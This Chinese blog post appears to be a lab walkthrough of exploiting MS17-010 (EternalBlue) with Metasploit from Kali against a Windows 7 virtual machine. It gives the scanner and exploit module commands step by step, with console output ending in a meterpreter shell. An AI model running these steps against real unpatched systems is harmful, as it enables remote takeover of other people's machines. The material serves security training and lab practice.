永恒之蓝
前置
- kali为攻击机
- win7为靶机
- 关闭防火墙
开始
-
确保二者在同一网段,并互
ping- kali:
ifconfig - win7:
ipconfig
- kali:
-
使用
msfconsole命令进入msfmsf6 > -
搜索
ms17-010脚本search ms17-010
msf6 > search ms17-010 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection 4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce msf6 > -
选择使用
ms17-010辅助功能use auxiliary/scanner/smb/smb_ms17_010
sf6 > use auxiliary/scanner/smb/smb_ms17_010 msf6 auxiliary(scanner/smb/smb_ms17_010) > -
查看信息、设置靶机ip、运行
show options
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options Module options (auxiliary/scanner/smb/smb_ms17_010): Name Current Setting Required Description ---- --------------- -------- ----------- CHECK_ARCH true no Check for architecture on vulnerable hosts CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts CHECK_PIPE false no Check for named pipe on vulnerable hosts NAMED_PIPES /usr/share/metasploit-framework/data/wordlis yes List of named pipes to check ts/named_pipes.txt RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using- Metasploit RPORT 445 yes The SMB service port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads (max one per host) msf6 auxiliary(scanner/smb/smb_ms17_010) >set RHOSTS ip
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.234.129 rhosts => 192.168.234.129 msf6 auxiliary(scanner/smb/smb_ms17_010) >run
sf6 auxiliary(scanner/smb/smb_ms17_010) > run [+] 192.168.234.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7600 x64 (64-bit) [*] 192.168.234.129:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/smb/smb_ms17_010) > -
发现可能存在永恒之蓝漏洞
ms17-010,切换至攻击模式use exploit/windows/smb/ms17_010_eternalblue -
查看信息、设置靶机ip、运行
show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see msf6 exploit(windows/smb/ms17_010_eternalblue) >set RHOSTS ip
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts ip rhosts => ip msf6 exploit(windows/smb/ms17_010_eternalblue) >run
msf6 exploit(windows/smb/ms17_010_eternalblue) > run -
成功获取
shell,执行ipconfig查看ip地址meterpreter > ipconfig Interface 1 ============ Name : Software Loopback Interface 1 Hardware MAC : 00:00:00:00:00:00 MTU : 4294967295 IPv4 Address : 127.0.0.1 IPv4 Netmask : 255.0.0.0 IPv6 Address : ::1 IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff Interface 11 ============ Name : Intel(R) PRO/1000 MT Network Connection Hardware MAC : 00:0c:29:11:ce:b9 MTU : 1500 IPv4 Address : 192.168.234.129 IPv4 Netmask : 255.255.255.0 IPv6 Address : fe80::178:cae1:7a5e:4017 IPv6 Netmask : ffff:ffff:ffff:ffff:: Interface 12 ============ Name : Microsoft ISATAP Adapter Hardware MAC : 00:00:00:00:00:00 MTU : 1280 IPv6 Address : fe80::5efe:c0a8:ea81 IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff meterpreter >
扫一扫
1632
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
